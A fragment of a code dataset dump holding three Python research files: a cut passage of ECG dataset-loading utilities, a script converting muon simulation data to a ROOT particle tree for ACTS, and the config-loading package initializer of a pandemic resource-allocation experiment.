DIR_DSET, d_my['dir_nm'], d_my['fnm_labels'])\n df = pd.read_csv(recs_csv_fnm)\n return df.apply(lambda x: 
x.astype('category'))\n\n\ndef get_rec_paths(dnm):\n d_dset = config(f'{DIR_DSET}.{dnm}')\n dir_nm = d_dset['dir_nm']\n path_ = f'{PATH_BASE}/{DIR_DSET}/{dir_nm}'\n return sorted(glob.iglob(f'{path_}/{d_dset[\"rec_fmt\"]}', recursive=True))\n\n\ndef get_record_eg(dnm, n=0, ln=None):\n \"\"\"\n Get an arbitrary record\n\n :param dnm: Dataset name\n :param n: Entry in the dataset\n :param ln: Number of samples in the record\n if None, full record returned\n\n .. note:: Works only if a wfdb record file exists\n \"\"\"\n rec_path = get_rec_paths(dnm)[n]\n kwargs = dict(sampto=ln)\n kwargs = {k: v for k, v in kwargs.items() if v is not None}\n return wfdb.rdrecord(rec_path[:rec_path.index('.')], **kwargs)\n\n\ndef fnm2sigs(fnm, dnm, to_fp32: bool = True):\n if dnm == 'CHAP_SHAO':\n arr = pd.read_csv(fnm).to_numpy().T\n elif dnm == 'CODE_TEST': # one hdf5 file with all recordings\n assert isinstance(fnm, int)\n if not hasattr(fnm2sigs, 'ct_tracings'): # cache the h5 handle on the function object\n fnms = get_rec_paths(dnm)\n assert len(fnms) == 1\n fnm2sigs.ct_tracings = h5py.File(fnms[0], 'r')\n\n arr = fnm2sigs.ct_tracings['tracings'][fnm]\n else:\n arr = wfdb.rdsamp(fnm.removesuffix(config(f'datasets.{dnm}.rec_ext')))[0].T # (signal, meta)\n if to_fp32:\n arr = arr.astype(np.float32) # for faster processing, & for ML anyway\n return arr\n\n\ndef get_signal_eg(dnm=None, n=None):\n \"\"\"\n :param dnm: Dataset name, sampled at random if not given\n :param n: Entry in the dataset, sampled at random if not given\n :return: A 12*`l` array of raw signal samples\n \"\"\"\n if dnm is None:\n dsets = config('datasets_export.total')\n idx = np.random.randint(len(dsets))\n dnm = dsets[idx]\n if n is None:\n n = np.random.randint(config(f'{DIR_DSET}.{dnm}.n_rec'))\n\n if dnm == 'CHAP_SHAO':\n return fnm2sigs(get_rec_paths(dnm)[n], dnm)\n elif dnm == 'CODE_TEST':\n return fnm2sigs(n, dnm)\n else:\n return get_record_eg(dnm, n=n).p_signal\n\n\ndef get_nlm_denoise_truth(verbose=False):\n dnm = 'CHAP_SHAO'\n fnm = get_rec_paths(dnm)[77] # Arbitrary\n fnm_stem = stem(fnm)\n dbg_path = os.path.join(PATH_BASE, DIR_DSET, config(f'{DIR_DSET}.{dnm}.dir_nm'), 'my_denoise_debugging')\n if verbose:\n ic(fnm, fnm_stem)\n ic(dbg_path)\n\n df = pd.read_csv(fnm)\n df_de = pd.read_csv(fnm.replace('ECGData', 'ECGDataDenoised'), header=None)\n if verbose:\n ic(fnm)\n ic(len(df))\n ic(df_de.head(6))\n ic(df_de.iloc[:6, 0])\n\n fnm_lowpass = os.path.join(dbg_path, f'{fnm_stem}, lowpass.csv')\n fnm_rloess = os.path.join(dbg_path, f'{fnm_stem}, rloess.csv')\n fnm_localres = os.path.join(dbg_path, f'{fnm_stem}, localres.csv')\n fnm_after2nd = os.path.join(dbg_path, f'{fnm_stem}, after2nd.csv')\n\n return (\n df.iloc[:]['I'].to_numpy(),\n df_de.iloc[:][0].to_numpy(),\n pd.read_csv(fnm_lowpass, header=None).iloc[:, 0].to_numpy(),\n pd.read_csv(fnm_rloess, header=None).iloc[:, 0].to_numpy(),\n pd.read_csv(fnm_localres, header=None).iloc[:, 0].to_numpy(),\n pd.read_csv(fnm_after2nd, header=None).iloc[:, 0].to_numpy()\n )\n\n\ndef get_processed_record_path(dataset_name, type: str = 'denoised'):\n ca(type=type, dataset_name=dataset_name)\n fmt = 'rec_fmt_denoised' if type == 'denoised' else 'rec_fmt'\n return os.path.join(get_processed_path(), config(f'datasets.my.{fmt}') % dataset_name)\n\n\nif __name__ == '__main__':\n from icecream import ic\n\n ic(get_signal_eg(dnm='G12EC', n=0).shape)\n ic(get_signal_eg(dnm='CHAP_SHAO', n=0))\n ic(get_signal_eg(dnm='CODE_TEST', n=0).shape)\n
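\n # Hypothetical sanity check for fit_power_law on synthetic data (values assumed):\n # xs = np.arange(1, 50)\n # (a, b), (xf, yf) = fit_power_law(xs, 3 * xs ** -0.5, return_fit=True)\n # ic(a, b) # should recover roughly a=3, b=-0.5\n\n for dnm_ in config(f'datasets_export.total'):\n path = get_rec_paths(dnm_)[0]\n ic(dnm_, stem(path, 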
ext=True), sizeof_fmt(os.path.getsize(path)))\n","repo_name":"StefanHeng/ECG-Representation-Learning","sub_path":"ecg_transformer/util/ecg.py","file_name":"ecg.py","file_ext":"py","file_size_in_byte":9311,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"19"} +{"seq_id":"42820655065","text":"import ROOT as r\n\nimport pyhepmc.io\nimport numpy as np\nimport random\n\nz_FLArE_F2= 10260\noutput_file = f'/data/atlassmallfiles/users/salin/acts_F2/GEN/Muon_FLArE/convert/test/Particles_muon_FLArE_test_z{z_FLArE_F2}m.root'\n\n\n# Define the particle data types\nparticles_dtype = {\n \"event_id\": np.int32,\n \"particle_id\": \"unsigned long\",\n \"particle_type\": \"int\",\n \"process\": \"unsigned int\",\n \"vx\": \"double\",\n \"vy\": \"double\",\n \"vz\": \"double\",\n \"vt\": \"double\",\n \"px\": \"double\",\n \"py\": \"double\",\n \"pz\": \"double\",\n \"m\": \"double\",\n \"q\": \"double\",\n \"eta\": \"double\",\n \"phi\": \"double\",\n \"theta\": \"double\",\n \"pt\": \"double\",\n \"p\": \"double\",\n \"vertex_primary\": \"unsigned int\",\n \"vertex_secondary\": \"unsigned int\",\n \"particle\": \"unsigned int\",\n \"generation\": \"unsigned int\",\n \"sub_particle\": \"unsigned int\"\n}\n\n# Create a ROOT file and tree\noutput = r.TFile(output_file, \"RECREATE\")\ntree = r.TTree(\"particles\", \"Particle information\")\n\n# Create vectors for each branch\nevent_id = np.zeros(1, dtype=np.int32)\nparticle_id = r.vector('unsigned long')()\nparticle_type = r.vector('int')()\nprocess = r.vector('unsigned int')()\nvx = r.vector('double')()\nvy = r.vector('double')()\nvz = r.vector('double')()\nvt = r.vector('double')()\npx = r.vector('double')()\npy = r.vector('double')()\npz = r.vector('double')()\nm = r.vector('double')()\nq = r.vector('double')()\neta = r.vector('double')()\nphi = r.vector('double')()\ntheta = r.vector('double')()\npt = r.vector('double')()\np = r.vector('double')()\nvertex_primary = r.vector('unsigned int')()\nvertex_secondary = r.vector('unsigned int')()\nparticle = r.vector('unsigned int')()\ngeneration = r.vector('unsigned int')()\nsub_particle = r.vector('unsigned int')()\n\n# Add the branches to the tree\ntree.Branch(\"event_id\", event_id,\"event_id/i\")\ntree.Branch(\"particle_id\", particle_id)\ntree.Branch(\"particle_type\", particle_type)\ntree.Branch(\"process\", process)\ntree.Branch(\"vx\", vx)\ntree.Branch(\"vy\", vy)\ntree.Branch(\"vz\", vz)\ntree.Branch(\"vt\", vt)\ntree.Branch(\"px\", px)\ntree.Branch(\"py\", py)\ntree.Branch(\"pz\", pz)\ntree.Branch(\"m\", m)\ntree.Branch(\"q\", q)\ntree.Branch(\"eta\", eta)\ntree.Branch(\"phi\", phi)\ntree.Branch(\"theta\", theta)\ntree.Branch(\"pt\", pt)\ntree.Branch(\"p\", p)\ntree.Branch(\"vertex_primary\", vertex_primary)\ntree.Branch(\"vertex_secondary\", vertex_secondary)\ntree.Branch(\"particle\", particle)\ntree.Branch(\"generation\", generation)\ntree.Branch(\"sub_particle\", sub_particle)\n\n\n# Calculate the particle's eta, phi, pt,p\n#IMPORTANT1 : There was a rotation in the Axis from XYZ into Z'Y'X'(new beamline along X' and Magnetic field along Z') to make ACTS work Z-> X' and X->-Z'\n#IMPORTANT2 Different definition ACTS and FORESEE Y->X->Z'\n\n#Take information from the muon simulation\n# Load muon data\nfilename_mu = '/data/atlassmallfiles/users/salin/acts_F2/GEN/Muon_FLArE/muons.root'\nfile_mu = r.TFile(filename_mu)\ntree_mu = file_mu.Get(\"muons\")\n\n\n\nn_entries = tree_mu.GetEntries()\n\nfor i in range(n_entries):\n tree_mu.GetEntry(i)\n\n vx_mu = 
tree_mu.vz # IMPORTANT1: vertex_x' -> vertex_z\n vy_mu = - tree_mu.vx # IMPORTANT1 and IMPORTANT2: vertex_y'>vertex_x'->-vertex_z-> -vertex_x\n vz_mu = tree_mu.vy #vertex_z' ->-vertex_x-> vertex_y *IMPORTANT1 and IMPORTANT2\n px_mu = tree_mu.pz #pz'->px\n py_mu = - tree_mu.px #py'->px'->-pz -> -px\n pz_mu = tree_mu.py #pz'->-px->py\n E_mu = tree_mu.E\n\n\n p_mu = np.sqrt(px_mu**2 + py_mu**2 + pz_mu**2)\n theta_mu = np.arccos(pz_mu/p_mu)\n phi_mu = np.arctan2(py_mu, px_mu)\n eta_mu = 0.5 * np.log((p_mu + pz_mu) / (p_mu - pz_mu))\n pt_mu = np.sqrt(px_mu**2 + py_mu**2)\n\n event_id[0] = i\n particle_id.push_back(4503599660924928)\n particle_type.push_back(13) # assuming muon if pz<0, else anti-muon\n process.push_back(0)\n vx.push_back(vx_mu-z_FLArE_F2) # IMPORTANT1: vertex_x' -> vertex_z\n vy.push_back(vy_mu) # IMPORTANT1 and IMPORTANT2: vertex_y'>vertex_x'->-vertex_z\n vz.push_back(vz_mu) # IMPORTANT1 and IMPORTANT2: vertex_z' ->-vertex_x-> vertex_y\n vt.push_back(0)\n px.push_back(px_mu) # pz'->px\n py.push_back(py_mu) # py'->px'->-pz\n pz.push_back(pz_mu) # pz'->-px->py\n m.push_back(0.105658) # muon mass\n q.push_back(-1) # assuming muon if pz<0, else anti-muon\n eta.push_back(eta_mu)\n phi.push_back(phi_mu)\n theta.push_back(theta_mu)\n pt.push_back(pt_mu)\n p.push_back(p_mu)\n vertex_primary.push_back(1)\n vertex_secondary.push_back(0)\n particle.push_back(1) # assuming muon if pz<0, else anti-muon\n generation.push_back(0)\n sub_particle.push_back(0)\n\n tree.Fill()\n\n particle_id.clear()\n particle_type.clear()\n process.clear()\n vx.clear()\n vy.clear()\n vz.clear()\n vt.clear()\n px.clear()\n py.clear()\n pz.clear()\n m.clear()\n q.clear()\n eta.clear()\n phi.clear()\n theta.clear()\n pt.clear()\n p.clear()\n vertex_primary.clear()\n vertex_secondary.clear()\n particle.clear()\n generation.clear()\n sub_particle.clear()\n\noutput.Write()\noutput.Close()\n","repo_name":"ldk111/FASER-2-MPhys-Project","sub_path":"Muon Flux Data Preparation/Olivier Example Scripts/Convert_Muon_ACTS.py","file_name":"Convert_Muon_ACTS.py","file_ext":"py","file_size_in_byte":5042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"26341833431","text":"# Package initialisation file.\n#\n# This file's role is to grab the relevant configuration preferences from\n# /config/CONFIG.py and initialise the package.\n#\n# Do not add variables here that would be considered configuration parameters;\n# only use this file to load the relevant configuration preferences from the\n# CONFIG.py file, and to make them available to the other modules.\n\n# To actually add/edit configuration options, edit the /config/CONFIG.py file\n# directly (using normal python syntax), and then import / export here as\n# needed.\n\n\n\n#################################################################\n### Initial imports and sanity checks required for initialization\n#################################################################\n\nimport os\nimport sys\nimport numpy\nimport importlib\n\nos.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = '1'\nimport pygame\n\n# Check if --config was specified. 
If not, load the default CONFIG.py file.\nif '--config' in sys.argv:\n ConfigParam = sys.argv[ sys.argv.index( '--config' ) + 1 ]\n ConfigPath = os.path.abspath( os.path.dirname( ConfigParam ) )\n ConfigModule = os.path.basename( ConfigParam )\n assert ConfigModule.endswith('py'), \"The specified config file needs to be a valid python module\"\n ConfigModule = ConfigModule[ : -3 ]\n sys.path.append( ConfigPath )\n CONFIG = importlib.import_module( ConfigModule )\nelse:\n from . config import CONFIG\n\n\n# Detect package directory, and use to create standard paths relative to package\n# root.\n\nPKG_ROOT = os.path.abspath( os.path.dirname( __file__ ) )\nCONFIG_FILE = CONFIG.__file__\nDOCUMENTATION_PATH = os.path.join( PKG_ROOT, 'doc' )\nRESOURCES_PATH = os.path.join( PKG_ROOT, 'res' )\n\n# ANSI colour escape codes (for use in logging/debug messages)\nclass ANSI:\n BOLD = '\\033[1m'\n RED = '\\033[91m'\n GREEN = '\\033[92m'\n ORANGE = '\\033[93m'\n BLUE = '\\033[94m'\n PURPLE = '\\033[95m'\n RESET = '\\033[0m'\n\n\n# Check that we are running in the context of a python virtual env, to ensure\n# consistency/reproducibility between runs, in terms of what python\n# packages/versions are installed and used in the experiment.\n\nif not os.getenv( 'VIRTUAL_ENV' ):\n print(\nf\"\"\"{ANSI.PURPLE}\n\nWarning: No suitable VIRTUAL_ENV environmental variable detected.\n\nIn order to ensure consistency / reproducibility between runs, you might want to\nconsider always running this experiment from within a suitable python virtual\nenvironment, containing the python package versions specified in the package's\nrequirements.txt file.\n\nPress ENTER if you'd like to continue regardless (or Ctrl-C to abort).\n\n{ANSI.RESET}\"\"\" )\n try : input() # i.e. press Enter\n except KeyboardInterrupt: print( '\\n\\nExiting...' 
); exit()\n\n\n\n###################################\n### Process selected CONFIG.py file\n###################################\n\n# Import all configuration constants\nAGGREGATION_METHOD = CONFIG.AGGREGATION_METHOD\nALLOCATION_TYPE = CONFIG.ALLOCATION_TYPE\nAVAILABLE_RESOURCES_PER_SEQUENCE = CONFIG.AVAILABLE_RESOURCES_PER_SEQUENCE\nAVATAR_ICONS_SET = CONFIG.AVATAR_ICONS_SET\nBIOSEMI_CONNECTED = CONFIG.BIOSEMI_CONNECTED\nBLOCK_MODE_INDICES = CONFIG.BLOCK_MODE_INDICES\nCITY_RADIUS_REFLECTS_SEVERITY = CONFIG.CITY_RADIUS_REFLECTS_SEVERITY\nCOLORS = CONFIG.COLORS\nCONFIDENCE_TIMEOUT = CONFIG.CONFIDENCE_TIMEOUT\nCONFIDENCE_UPDATE_AMOUNT = CONFIG.CONFIDENCE_UPDATE_AMOUNT\nDEBUG = CONFIG.DEBUG\nDEBUG_RESOLUTION = CONFIG.DEBUG_RESOLUTION\nDETECT_USER_RESOLUTION = CONFIG.DETECT_USER_RESOLUTION\nDISPLAY_FEEDBACK = CONFIG.DISPLAY_FEEDBACK\nFALLBACK_RESOLUTION = CONFIG.FALLBACK_RESOLUTION\nFEEDBACK_SHOW_COMBINED_ALLOCATIONS = CONFIG.FEEDBACK_SHOW_COMBINED_ALLOCATIONS\nFEEDBACK_SHOW_GROUP_PERFORMANCE = CONFIG.FEEDBACK_SHOW_GROUP_PERFORMANCE\nFEEDBACK_SHOW_INDIVIDUAL_PERFORMANCES = CONFIG.FEEDBACK_SHOW_INDIVIDUAL_PERFORMANCES\nFORCE_MOUSEWHEEL_SCROLL_CONFIDENCE = CONFIG.FORCE_MOUSEWHEEL_SCROLL_CONFIDENCE\nINIT_NO_OF_CITIES = CONFIG.INIT_NO_OF_CITIES\nINITIAL_SEVERITY_FILE = CONFIG.INITIAL_SEVERITY_FILE\nINPUTS_PATH = CONFIG.get_INPUTS_PATH( PKG_ROOT )\nLIVE_EXPERIMENT = CONFIG.LIVE_EXPERIMENT\nLOBBY_PLAYERS = CONFIG.LOBBY_PLAYERS\nLOBBY_TIMEOUT = CONFIG.LOBBY_TIMEOUT\nMAX_ALLOCATABLE_RESOURCES = CONFIG.MAX_ALLOCATABLE_RESOURCES\nMAX_INIT_RESOURCES = CONFIG.MAX_INIT_RESOURCES\nMAX_INIT_SEVERITY = CONFIG.MAX_INIT_SEVERITY\nMIN_ALLOCATABLE_RESOURCES = CONFIG.MIN_ALLOCATABLE_RESOURCES\nMIN_INIT_RESOURCES = CONFIG.MIN_INIT_RESOURCES\nMIN_INIT_SEVERITY = CONFIG.MIN_INIT_SEVERITY\nMOVEMENT_REFRESH_RATE = CONFIG.MOVEMENT_REFRESH_RATE\nNUM_ATTEMPTS_TO_ASSIGN_SEQ = CONFIG.NUM_ATTEMPTS_TO_ASSIGN_SEQ\nNUM_BLOCKS = CONFIG.NUM_BLOCKS\nNUM_MAX_TRIALS = CONFIG.NUM_MAX_TRIALS\nNUM_MIN_TRIALS = CONFIG.NUM_MIN_TRIALS\nNUM_PREDEFINED_CITY_COORDS = CONFIG.NUM_PREDEFINED_CITY_COORDS\nNUM_SEQUENCES = CONFIG.NUM_SEQUENCES\nOUTPUT_FILE_PREFIX = CONFIG.OUTPUT_FILE_PREFIX\nOUTPUTS_PATH = CONFIG.get_OUTPUTS_PATH( PKG_ROOT )\nPANDEMIC_PARAMETER = CONFIG.PANDEMIC_PARAMETER\nPLAYER_TYPE = CONFIG.PLAYER_TYPE\nRANDOM_INITIAL_SEVERITY = CONFIG.RANDOM_INITIAL_SEVERITY\nRESPONSE_TIMEOUT = CONFIG.RESPONSE_TIMEOUT\nSAVE_INITIAL_SEVERITY_TO_FILE = CONFIG.SAVE_INITIAL_SEVERITY_TO_FILE\nSAVE_RESULTS = CONFIG.SAVE_RESULTS\nSEQ_LENGTHS_FILE = CONFIG.SEQ_LENGTHS_FILE\nSHOW_BEFORE_AND_AFTER_MAP = CONFIG.SHOW_BEFORE_AND_AFTER_MAP\nSHOW_PYGAME_IF_NONHUMAN_PLAYER = CONFIG.SHOW_PYGAME_IF_NONHUMAN_PLAYER\nSTARTING_BLOCK_INDEX = CONFIG.STARTING_BLOCK_INDEX\nSTARTING_SEQ_INDEX = CONFIG.STARTING_SEQ_INDEX\nTOTAL_NUM_TRIALS_IN_BLOCK = CONFIG.TOTAL_NUM_TRIALS_IN_BLOCK\nTRUST_MAX = CONFIG.TRUST_MAX\nUSE_FIXED_BLOCK_SEQUENCES = CONFIG.USE_FIXED_BLOCK_SEQUENCES\nVERBOSE = CONFIG.VERBOSE\nAGENT_NOISE_VARIANCE = CONFIG.AGENT_NOISE_VARIANCE\nAGENT_WAIT = CONFIG.AGENT_WAIT\n\n\n##########################################\n### Process imported configuration options\n##########################################\n\nif PLAYER_TYPE == 'playback': PLAYBACK_ID = CONFIG.PLAYBACK_ID\nelse : PLAYBACK_ID = 'N/A'\n\nRESPONSE_MULTIPLIER = PANDEMIC_PARAMETER\nSEVERITY_MULTIPLIER = 1 + PANDEMIC_PARAMETER\n\n\n\n##################################################################\n### Continue with non-configuration-related package 
initialization\n##################################################################\n\n# Let's define some some quick utility functions for logging purposes\ndef printcolor ( Str, AnsiColor, *args, **kwargs ): print( f\"{AnsiColor}{Str}{ANSI.RESET}\", *args, **kwargs )\ndef printstatus( Str, AnsiColor, *args, **kwargs ): print( f\"{AnsiColor}[{ANSI.RESET}{Str}{AnsiColor}]{ANSI.RESET}\", *args, **kwargs )\ndef printinfo ( Str, *args, **kwargs ) : printcolor( Str , ANSI.BLUE, *args, **kwargs )\ndef printconfig( Varname, Var, SuggestedValue = None ) :\n if SuggestedValue is None or Var == SuggestedValue:\n printinfo( f\"__init__: Setting { Varname } to { ANSI.ORANGE }{ Var }\" )\n else:\n printinfo( f\"__init__: Setting { Varname } to { ANSI.BOLD + ANSI.RED }{ Var }{ ANSI.RESET } (Suggested: {SuggestedValue})\" )\n\nprintinfo( \"\\n--- Initializing experiment ---\\n\" )\n\n# Import package documentation (to avoid having to dump it all on the top of this file instead). You could follow a\n# similar strategy in other modules if they are to contain significant documentation that would clutter the sources.\nPkgDoc = os.path.join( DOCUMENTATION_PATH, 'PES.__doc__' )\nwith open( PkgDoc, 'r' ) as f: __doc__ = f.read()\n\n# RGB tuples of frequently used colours\nWHITE = (255, 255, 255)\nYELLOW = (255, 255, 0)\nBLACK = ( 0, 0, 0)\nDARK_RED = (128, 0, 0)\nDARK_CYAN = ( 0, 128, 128)\nDARK_GREEN = ( 0, 128, 0)\nGREEN = ( 0, 255, 0)\nRED = (255, 0, 0)\nGRAY = ( 50, 50, 50)\nLIGHTGRAY = (180, 180, 180)\nLIGHTBLUE = (210, 220, 255)\n\n# The experiment uses tensorflow, which has a nasty habit of dumping lots of\n# warning messages for missing nvidia libraries etc. The following environmental\n# variable disables these. ( '0': all logs are shown; '1': filter out INFOs and\n# below; '2': filter out WARNs; '3': filter out ERRORs, etc )\nos.environ[ 'TF_CPP_MIN_LOG_LEVEL' ] =\"2\"\n\n# Set some nice numpy printing defaults and error handling\nnumpy.set_printoptions( threshold = numpy.inf, precision = 3, suppress = True,\n linewidth = 80, nanstr = \"--\", infstr = \"∞\" )\nnumpy.seterr( all = 'raise' )\n\n# Print all (important) final init variables to terminal\nif VERBOSE not in [ True, False ]:\n raise ValueError( 'Bad value given for VERBOSE environmental variable. Needs to be True or False.' 
)\n\n\nif VERBOSE:\n# Variable name Variable Value Suggested value check\n printconfig( 'PKG_ROOT' , PKG_ROOT )\n printconfig( 'CONFIG_FILE' , CONFIG_FILE )\n printconfig( 'AGGREGATION_METHOD' , AGGREGATION_METHOD, 'confidence_weighted_median' )\n printconfig( 'ALLOCATION_TYPE' , ALLOCATION_TYPE, 'shared' )\n printconfig( 'AVAILABLE_RESOURCES_PER_SEQUENCE' , AVAILABLE_RESOURCES_PER_SEQUENCE, 49 )\n printconfig( 'AVATAR_ICONS_SET' , AVATAR_ICONS_SET, 'PlaceholderAvatars' )\n printconfig( 'BLOCK_MODE_INDICES' , BLOCK_MODE_INDICES )\n printconfig( 'CITY_RADIUS_REFLECTS_SEVERITY' , CITY_RADIUS_REFLECTS_SEVERITY, False )\n printconfig( 'COLORS' , COLORS )\n printconfig( 'CONFIDENCE_TIMEOUT' , CONFIDENCE_TIMEOUT, 5000 )\n printconfig( 'CONFIDENCE_UPDATE_AMOUNT' , CONFIDENCE_UPDATE_AMOUNT, 0.05 )\n printconfig( 'DEBUG' , DEBUG, False )\n printconfig( 'DEBUG_RESOLUTION' , DEBUG_RESOLUTION, (762, 720) )\n printconfig( 'DETECT_USER_RESOLUTION' , DETECT_USER_RESOLUTION, True )\n printconfig( 'DISPLAY_FEEDBACK' , DISPLAY_FEEDBACK, True )\n printconfig( 'FALLBACK_RESOLUTION' , FALLBACK_RESOLUTION, (1143, 1080) )\n printconfig( 'FEEDBACK_SHOW_COMBINED_ALLOCATIONS' , FEEDBACK_SHOW_COMBINED_ALLOCATIONS, False )\n printconfig( 'FEEDBACK_SHOW_GROUP_PERFORMANCE' , FEEDBACK_SHOW_GROUP_PERFORMANCE , True )\n printconfig( 'FEEDBACK_SHOW_INDIVIDUAL_PERFORMANCES', FEEDBACK_SHOW_INDIVIDUAL_PERFORMANCES, False )\n printconfig( 'FORCE_MOUSEWHEEL_SCROLL_CONFIDENCE' , FORCE_MOUSEWHEEL_SCROLL_CONFIDENCE, False )\n printconfig( 'INIT_NO_OF_CITIES' , INIT_NO_OF_CITIES, 2 )\n printconfig( 'INPUTS_PATH' , INPUTS_PATH, os.path.join( PKG_ROOT, 'inputs' ) )\n printconfig( 'LIVE_EXPERIMENT' , LIVE_EXPERIMENT, True )\n printconfig( 'LOBBY_PLAYERS' , LOBBY_PLAYERS, 4 )\n printconfig( 'LOBBY_TIMEOUT' , LOBBY_TIMEOUT, 300 )\n printconfig( 'MAX_ALLOCATABLE_RESOURCES' , MAX_ALLOCATABLE_RESOURCES, 10 )\n printconfig( 'MAX_INIT_RESOURCES' , MAX_INIT_RESOURCES, 6 )\n printconfig( 'MAX_INIT_SEVERITY' , MAX_INIT_SEVERITY, 5 )\n printconfig( 'MIN_ALLOCATABLE_RESOURCES' , MIN_ALLOCATABLE_RESOURCES, 0 )\n printconfig( 'MIN_INIT_RESOURCES' , MIN_INIT_RESOURCES, 3 )\n printconfig( 'MIN_INIT_SEVERITY' , MIN_INIT_SEVERITY, 2 )\n printconfig( 'MOVEMENT_REFRESH_RATE' , MOVEMENT_REFRESH_RATE, 7 )\n printconfig( 'NUM_ATTEMPTS_TO_ASSIGN_SEQ' , NUM_ATTEMPTS_TO_ASSIGN_SEQ, 8 )\n printconfig( 'NUM_BLOCKS' , NUM_BLOCKS, 8 )\n printconfig( 'NUM_MAX_TRIALS' , NUM_MAX_TRIALS, 10 )\n printconfig( 'NUM_MIN_TRIALS' , NUM_MIN_TRIALS, 3 )\n printconfig( 'NUM_PREDEFINED_CITY_COORDS' , NUM_PREDEFINED_CITY_COORDS, 25 )\n printconfig( 'NUM_SEQUENCES' , NUM_SEQUENCES, 8 )\n printconfig( 'OUTPUT_FILE_PREFIX' , OUTPUT_FILE_PREFIX, 'PES_full_' )\n printconfig( 'OUTPUTS_PATH' , OUTPUTS_PATH, os.path.join( PKG_ROOT, 'outputs' ) )\n printconfig( 'PANDEMIC_PARAMETER' , PANDEMIC_PARAMETER , 0.6 )\n printconfig( 'PLAYER_TYPE' , PLAYER_TYPE, 'human' )\n printconfig( 'PLAYBACK_ID' , PLAYBACK_ID )\n printconfig( 'RANDOM_INITIAL_SEVERITY' , RANDOM_INITIAL_SEVERITY, False )\n printconfig( 'RESPONSE_TIMEOUT' , RESPONSE_TIMEOUT, 10000 )\n printconfig( 'RESPONSE_MULTIPLIER' , RESPONSE_MULTIPLIER, 0.6 )\n printconfig( 'SAVE_INITIAL_SEVERITY_TO_FILE' , SAVE_INITIAL_SEVERITY_TO_FILE, False )\n printconfig( 'SAVE_RESULTS' , SAVE_RESULTS, True )\n printconfig( 'SEVERITY_MULTIPLIER' , SEVERITY_MULTIPLIER, 1.6 )\n printconfig( 'SHOW_BEFORE_AND_AFTER_MAP' , SHOW_BEFORE_AND_AFTER_MAP, False )\n printconfig( 'SHOW_PYGAME_IF_NONHUMAN_PLAYER' , SHOW_PYGAME_IF_NONHUMAN_PLAYER, False )\n 
printconfig( 'STARTING_BLOCK_INDEX' , STARTING_BLOCK_INDEX, 0 )\n printconfig( 'STARTING_SEQ_INDEX' , STARTING_SEQ_INDEX, 0 )\n printconfig( 'TOTAL_NUM_TRIALS_IN_BLOCK' , TOTAL_NUM_TRIALS_IN_BLOCK, 45 )\n printconfig( 'TRUST_MAX' , TRUST_MAX , 100 )\n printconfig( 'USE_FIXED_BLOCK_SEQUENCES' , USE_FIXED_BLOCK_SEQUENCES, True )\n printconfig( 'VERBOSE' , VERBOSE, True )\n printconfig( 'BIOSEMI_CONNECTED' , BIOSEMI_CONNECTED, False )\n printconfig( 'SEQ_LENGTHS_FILE' , SEQ_LENGTHS_FILE, 'sequence_lengths.csv' )\n printconfig( 'INITIAL_SEVERITY_FILE' , INITIAL_SEVERITY_FILE, 'initial_severity.csv' )\n\n\n# Initialise pygame engine\nif VERBOSE:\n printinfo( \"__init__: Initializing pygame engine ... \", end = '', flush = True )\n pygame.init();\n printstatus( 'Done', ANSI.GREEN )\nelse:\n pygame.init()\n\n\n# List of package variables to be made available to package modules\n__all__ = [\n 'PKG_ROOT',\n 'CONFIG_FILE',\n 'DOCUMENTATION_PATH',\n 'RESOURCES_PATH',\n 'VERBOSE',\n 'BIOSEMI_CONNECTED',\n 'SEQ_LENGTHS_FILE',\n 'INITIAL_SEVERITY_FILE',\n 'WHITE',\n 'YELLOW',\n 'BLACK',\n 'DARK_RED',\n 'DARK_CYAN',\n 'DARK_GREEN',\n 'GREEN',\n 'RED',\n 'GRAY',\n 'LIGHTGRAY',\n 'LIGHTBLUE',\n\n 'ANSI',\n 'printinfo',\n 'printstatus',\n 'printconfig',\n\n 'AGGREGATION_METHOD',\n 'ALLOCATION_TYPE',\n 'AVAILABLE_RESOURCES_PER_SEQUENCE',\n 'AVATAR_ICONS_SET',\n 'BLOCK_MODE_INDICES',\n 'CITY_RADIUS_REFLECTS_SEVERITY',\n 'COLORS',\n 'CONFIDENCE_TIMEOUT',\n 'CONFIDENCE_UPDATE_AMOUNT',\n 'DEBUG',\n 'DEBUG_RESOLUTION',\n 'DETECT_USER_RESOLUTION',\n 'DISPLAY_FEEDBACK',\n 'FALLBACK_RESOLUTION',\n 'FEEDBACK_SHOW_COMBINED_ALLOCATIONS',\n 'FEEDBACK_SHOW_GROUP_PERFORMANCE',\n 'FEEDBACK_SHOW_INDIVIDUAL_PERFORMANCES',\n 'FORCE_MOUSEWHEEL_SCROLL_CONFIDENCE',\n 'INIT_NO_OF_CITIES',\n 'INPUTS_PATH',\n 'LIVE_EXPERIMENT',\n 'LOBBY_PLAYERS',\n 'LOBBY_TIMEOUT',\n 'MAX_ALLOCATABLE_RESOURCES',\n 'MAX_INIT_RESOURCES',\n 'MAX_INIT_SEVERITY',\n 'MIN_ALLOCATABLE_RESOURCES',\n 'MIN_INIT_RESOURCES',\n 'MIN_INIT_SEVERITY',\n 'MOVEMENT_REFRESH_RATE',\n 'NUM_ATTEMPTS_TO_ASSIGN_SEQ',\n 'NUM_BLOCKS',\n 'NUM_MAX_TRIALS',\n 'NUM_MIN_TRIALS',\n 'NUM_PREDEFINED_CITY_COORDS',\n 'NUM_SEQUENCES',\n 'OUTPUT_FILE_PREFIX',\n 'OUTPUTS_PATH',\n 'PANDEMIC_PARAMETER',\n 'PLAYBACK_ID',\n 'PLAYER_TYPE',\n 'RANDOM_INITIAL_SEVERITY',\n 'RESPONSE_MULTIPLIER',\n 'RESPONSE_TIMEOUT',\n 'SAVE_INITIAL_SEVERITY_TO_FILE',\n 'SAVE_RESULTS',\n 'SEVERITY_MULTIPLIER',\n 'SHOW_BEFORE_AND_AFTER_MAP',\n 'SHOW_PYGAME_IF_NONHUMAN_PLAYER',\n 'STARTING_BLOCK_INDEX',\n 'STARTING_SEQ_INDEX',\n 'TOTAL_NUM_TRIALS_IN_BLOCK',\n 'TRUST_MAX',\n 'USE_FIXED_BLOCK_SEQUENCES'\n]\n\nif VERBOSE: print() # Just to separate initialization messages from rest of 